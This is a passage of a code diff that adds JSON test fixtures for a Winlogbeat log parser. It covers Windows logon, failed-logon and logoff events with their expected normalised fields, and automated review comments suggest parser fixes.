\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}" + }, + "expected": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process 
\",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication 
Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. 
This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" + ], + "code": "4624", + "kind": "event", + "module": "security", + "original": "An account was successfully logged on.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tWS-USER-01$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nLogon Information:\n\tLogon Type:\t\t3\n\tRestricted Admin Mode:\t-\n\tVirtual Account:\t\tNo\n\tElevated Token:\t\tNo\n\nImpersonation Level:\t\tImpersonation\n\nNew Logon:\n\tSecurity ID:\t\tS-4-5-6\n\tAccount Name:\t\ttarget_user\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0xFCEBB74A\n\tLinked Logon ID:\t\t0x0\n\tNetwork Account Name:\t-\n\tNetwork Account Domain:\t-\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\n\nProcess Information:\n\tProcess ID:\t\t0x2f0\n\tProcess Name:\t\tC:\\Windows\\System32\\executable.exe\n\nNetwork Information:\n\tWorkstation Name:\tWS-USER-01\n\tSource Network Address:\t1.2.3.4\n\tSource Port:\t\t29051\n\nDetailed Authentication Information:\n\tLogon Process:\t\tProcess \n\tAuthentication Package:\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\n\tTransited Services:\t-\n\tPackage Name (NTLM only):\t-\n\tKey Length:\t\t0\n\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\n\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\n\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\n\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\n\nThe network fields indicate where a remote logon request originated. 
Workstation name is not always available and may be left blank in some cases.\n\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\n\nThe authentication information fields provide detailed information about this specific logon request.\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\n\t- Transited services indicate which intermediate services have participated in this logon request.\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.", + "type": [ + "start" + ] + }, + "@timestamp": "2024-11-12T08:41:05.803000Z", + "action": { + "id": 4624, + "outcome": "success", + "properties": { + "AuthenticationPackageName": "MICROSOFT_AUTHENTICATION_PACKAGE_V1_0", + "ElevatedToken": "%%1843", + "ImpersonationLevel": "%%1833", + "IpAddress": "1.2.3.4", + "IpPort": "29051", + "KeyLength": "0", + "LmPackageName": "-", + "LogonGuid": "{00000000-0000-0000-0000-000000000000}", + "LogonProcessName": "Process ", + "LogonType": "3", + "ProcessId": "0x2f0", + "ProcessName": "C:\\Windows\\System32\\executable.exe", + "RestrictedAdminMode": "-", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "WS-USER-01$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "DOMAIN", + "TargetLinkedLogonId": "0x0", + "TargetLogonId": "0xfcebb74a", + "TargetOutboundDomainName": "-", + "TargetOutboundUserName": "-", + "TargetUserName": "target_user", + "TargetUserSid": "S-4-5-6", + "TransmittedServices": "-", + "VirtualAccount": "%%1843", + "WorkstationName": "WS-USER-01" + } + }, + "agent": { + "ephemeral_id": "12345678-1234-5678-9012-123456789012", + "id": "abcd1234-abcd-1234-ef56-abcdef123456", + "type": "winlogbeat", + "version": "7.0.0" + }, + "client": { + "ip": "1.2.3.4" + }, + "host": { + "architecture": "x86_64", + 
"hostname": "hostname",
+ "id": "abcdefab-1234-5678-9012-abcdefabcdef",
+ "name": "hostname",
+ "os": {
+ "build": "17763.6414",
+ "family": "windows",
+ "kernel": "10.0.17763.6414 (WinBuild.160101.0800)",
+ "name": "Windows Server 2019 Datacenter",
+ "platform": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "related": {
+ "hosts": [
+ "hostname"
+ ]
+ },
+ "sekoiaio": {
+ "authentication": {
+ "process": {
+ "name": "Process "
+ }
+ },
+ "client": {
+ "name": "WS-USER-01",
+ "os": {
+ "type": "windows"
+ }
+ },
+ "server": {
+ "name": "hostname",
+ "os": {
+ "type": "windows"
+ }
+ }
+ },
+ "user": {
+ "id": "S-1-2-3",
+ "name": "WS-USER-01$",
+ "target": {
+ "domain": "DOMAIN",
+ "id": "S-4-5-6",
+ "name": "target_user"
+ }
+ },
+ "winlog": {
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "hostname.company.com",
+ "event_id": "4624",
+ "keywords": [
+ "Audit Success"
+ ],
+ "logon": {
+ "id": "0x3e7",
+ "type": "Network"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 752,
+ "thread": {
+ "id": 7960
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "1170100815",
+ "task": "Logon",
+ "version": 2
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4625.json b/Beats/winlogbeat/tests/security_event_4625.json
new file mode 100644
index 000000000..ac5882d46
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4625.json
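Review bot: The expected output pins `sekoiaio.authentication.process.name` (and `action.properties.LogonProcessName`) as `"Process "` with the trailing blank copied from `event_data.LogonProcessName`, so any rule matching the logon process name exactly has to reproduce that whitespace; trimming the value in the parser and asserting `"name": "Process"` here would be the safer contract. The fixture also locks in that no `related.user` is produced for 4624 although `user.name` and `user.target.name` are filled, and that the workstation `WS-USER-01` lands only in `sekoiaio.client.name` and not in `related.hosts`, whereas the 4634 fixture in this patch fills `related.user` and the 4625 fixture lists the workstation in `related.hosts` (apparently via `source.domain`); if that asymmetry is not intended, the parser gap should be fixed before this expected block pins it. `event.outcome` is absent here even though `winlog.keywords` carries `Audit Success` and `action.outcome` is `success`; deriving `event.outcome` from the keyword would keep 4624 consistent with the 4625 fixture's `event.outcome: failure`.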
@@ -0,0 +1,193 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\
"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:40:34.260Z\",\"event\":{\"action\":\"Logon\",\"outcome\":\"failure\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4625\",\"created\":\"2024-11-12T08:40:35.900Z\",\"kind\":\"event\",\"dataset\":\"system.security\"},\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{12345678-ABCD-EFAB-CDEF-123456789012}\",\"keywords\":[\"Audit 
Failure\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Logon\",\"process\":{\"pid\":824,\"thread\":{\"id\":28936}},\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"FailureReason\":\"%%2313\",\"IpPort\":\"-\",\"KeyLength\":\"0\",\"Status\":\"0xc000006d\",\"TargetUserSid\":\"S-1-0-0\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"IpAddress\":\"-\",\"LogonProcessName\":\"Channel\",\"SubjectLogonId\":\"0x3e7\",\"SubStatus\":\"0xc0000064\",\"WorkstationName\":\"WORKSTATION\",\"SubjectDomainName\":\"J_DOE\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"SubjectUserName\":\"WORKSTATION$\",\"LmPackageName\":\"-\",\"ProcessId\":\"0x338\",\"AuthenticationPackageName\":\"Kerberos\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"WORKSTATION.johndoe.com\",\"record_id\":2552812283,\"event_id\":\"4625\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"WORKSTATION\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"hostname\",\"mac\":[\"00-00-00-00-00-00-00-00\",\"11-11-11-11-11-11\",\"A0-B1-C2-D3-E4-F5\",\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.14393.7426 (rs1_release.240926-1524)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2016 Datacenter\",\"build\":\"14393.7428\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"fe80::1234:5678:90ab:cde\",\"5.6.7.8\",\"fe80::1111:2222:3333:4444\",\"4.3.2.1\",\"fe80::aaaa:bbbb:cccc:dddd\",\"1.2.3.4\",\"fe80::1234:abcd:ef\",\"fe80::abcd:1234:567\",\"fe80::a0b1:c2d:3e4\"]},\"tags\":[\"Windows\",\"beats_input_raw_event\"]}", + "event": { + "action": "authentication_network", + "category": [ + "authentication" 
+ ],
+ "code": "4625",
+ "kind": "event",
+ "module": "security",
+ "outcome": "failure",
+ "provider": "Microsoft-Windows-Security-Auditing",
+ "reason": "user_not_exist",
+ "type": [
+ "start"
+ ]
+ },
+ "@timestamp": "2024-11-12T08:40:34.260000Z",
+ "action": {
+ "id": 4625,
+ "outcome": "failure",
+ "properties": {
+ "AuthenticationPackageName": "Kerberos",
+ "FailureReason": "%%2313",
+ "IpAddress": "-",
+ "IpPort": "-",
+ "KeyLength": "0",
+ "LmPackageName": "-",
+ "LogonProcessName": "Channel",
+ "LogonType": "3",
+ "ProcessId": "0x338",
+ "ProcessName": "C:\\Windows\\System32\\executable.exe",
+ "Status": "0xc000006d",
+ "SubStatus": "0xc0000064",
+ "SubjectDomainName": "J_DOE",
+ "SubjectLogonId": "0x3e7",
+ "SubjectUserName": "WORKSTATION$",
+ "SubjectUserSid": "S-1-2-3",
+ "TargetUserSid": "S-1-0-0",
+ "TransmittedServices": "-",
+ "WorkstationName": "WORKSTATION"
+ }
+ },
+ "agent": {
+ "ephemeral_id": "11111111-2222-3333-4444-555555555555",
+ "id": "12345678-abcd-ef90-1234-abcdef123456",
+ "name": "WORKSTATION",
+ "type": "filebeat",
+ "version": "8.14.1"
+ },
+ "host": {
+ "architecture": "x86_64",
+ "hostname": "hostname",
+ "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee",
+ "ip": [
+ "1.2.3.4",
+ "4.3.2.1",
+ "5.6.7.8",
+ "fe80::1111:2222:3333:4444",
+ "fe80::1234:5678:90ab:cde",
+ "fe80::1234:abcd:ef",
+ "fe80::a0b1:c2d:3e4",
+ "fe80::aaaa:bbbb:cccc:dddd",
+ "fe80::abcd:1234:567"
+ ],
+ "mac": [
+ "00-00-00-00-00-00-00-00",
+ "11-11-11-11-11-11",
+ "A0-B1-C2-D3-E4-F5",
+ "AA-BB-CC-DD-EE-FF"
+ ],
+ "name": "hostname",
+ "os": {
+ "build": "14393.7428",
+ "family": "windows",
+ "kernel": "10.0.14393.7426 (rs1_release.240926-1524)",
+ "name": "Windows Server 2016 Datacenter",
+ "platform": "windows",
+ "type": "windows",
+ "version": "10.0"
+ }
+ },
+ "log": {
+ "level": "information"
+ },
+ "process": {
+ "executable": "C:\\Windows\\System32\\executable.exe",
+ "name": "executable.exe",
+ "pid": 824
+ },
+ "related": {
+ "hosts": [
+ "WORKSTATION",
+
"hostname"
+ ],
+ "ip": [
+ "1.2.3.4",
+ "4.3.2.1",
+ "5.6.7.8",
+ "fe80::1111:2222:3333:4444",
+ "fe80::1234:5678:90ab:cde",
+ "fe80::1234:abcd:ef",
+ "fe80::a0b1:c2d:3e4",
+ "fe80::aaaa:bbbb:cccc:dddd",
+ "fe80::abcd:1234:567"
+ ]
+ },
+ "sekoiaio": {
+ "authentication": {
+ "process": {
+ "name": "Channel"
+ }
+ },
+ "client": {
+ "name": "WORKSTATION",
+ "os": {
+ "type": "windows"
+ }
+ },
+ "server": {
+ "name": "hostname",
+ "os": {
+ "type": "windows"
+ }
+ }
+ },
+ "server": {
+ "ip": [
+ "1.2.3.4",
+ "4.3.2.1",
+ "5.6.7.8",
+ "fe80::1111:2222:3333:4444",
+ "fe80::1234:5678:90ab:cde",
+ "fe80::1234:abcd:ef",
+ "fe80::a0b1:c2d:3e4",
+ "fe80::aaaa:bbbb:cccc:dddd",
+ "fe80::abcd:1234:567"
+ ]
+ },
+ "source": {
+ "address": "WORKSTATION",
+ "domain": "WORKSTATION",
+ "port": 0
+ },
+ "user": {
+ "id": "S-1-2-3",
+ "name": "WORKSTATION$",
+ "target": {
+ "id": "S-1-0-0"
+ }
+ },
+ "winlog": {
+ "activity_id": "{12345678-abcd-efab-cdef-123456789012}",
+ "api": "wineventlog",
+ "channel": "Security",
+ "computer_name": "WORKSTATION.johndoe.com",
+ "event_id": "4625",
+ "keywords": [
+ "Audit Failure"
+ ],
+ "logon": {
+ "failure": {
+ "reason": "Unknown user name or bad password.",
+ "status": "This is either due to a bad username or authentication information",
+ "sub_status": "User logon with misspelled or bad user account"
+ },
+ "id": "0x3e7",
+ "type": "Network"
+ },
+ "opcode": "Info",
+ "process": {
+ "pid": 824,
+ "thread": {
+ "id": 28936
+ }
+ },
+ "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}",
+ "provider_name": "Microsoft-Windows-Security-Auditing",
+ "record_id": "2552812283",
+ "task": "Logon"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Beats/winlogbeat/tests/security_event_4634.json b/Beats/winlogbeat/tests/security_event_4634.json
new file mode 100644
index 000000000..ddc69e63b
--- /dev/null
+++ b/Beats/winlogbeat/tests/security_event_4634.json
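Review bot: The input's `event_data` carries no `TargetUserName`/`TargetDomainName`, so the expected block only asserts `user.target.id: "S-1-0-0"` and this fixture never exercises the mapping of the attempted account name, which is the field failed-logon detections key on; adding a constructed pair such as `"TargetUserName": "target_user", "TargetDomainName": "DOMAIN"` to the input and the matching `user.target.name`/`user.target.domain` to the expected output would close that gap. The expected `"source": {"address": "WORKSTATION", "domain": "WORKSTATION", "port": 0}` shows `IpPort: "-"` being turned into a real-looking port `0` while `source.ip` is correctly left unset for `IpAddress: "-"`; the parser should skip the placeholder and the expected block should omit `source.port` rather than pin the synthetic value. `host.ip`, `related.ip` and `server.ip` all repeat the same nine addresses, which is presumably the collector host's interface list rather than anything about the logon source, so it is worth confirming that `server.ip` is meant to be populated that way.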
@@ -0,0 +1,112 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:42:47.895Z\",\"event\":{\"action\":\"Logoff\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4634\",\"created\":\"2024-11-12T08:42:48.190Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.\"},\"message\":\"An account was logged off.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tJ_DOE\\n\\tLogon ID:\\t\\t0x5ED35BB6\\n\\nLogon Type:\\t\\t\\t3\\n\\nThis event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. 
Logon IDs are only unique between reboots on the same computer.\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"Logoff\",\"channel\":\"Security\",\"process\":{\"pid\":704,\"thread\":{\"id\":6336}},\"event_data\":{\"TargetUserName\":\"ACCOUNT\",\"TargetLogonId\":\"0x5ed35bb6\",\"TargetUserSid\":\"S-1-2-3\",\"LogonType\":\"3\",\"TargetDomainName\":\"J_DOE\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.jdoe.com\",\"record_id\":15983780774,\"event_id\":\"4634\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 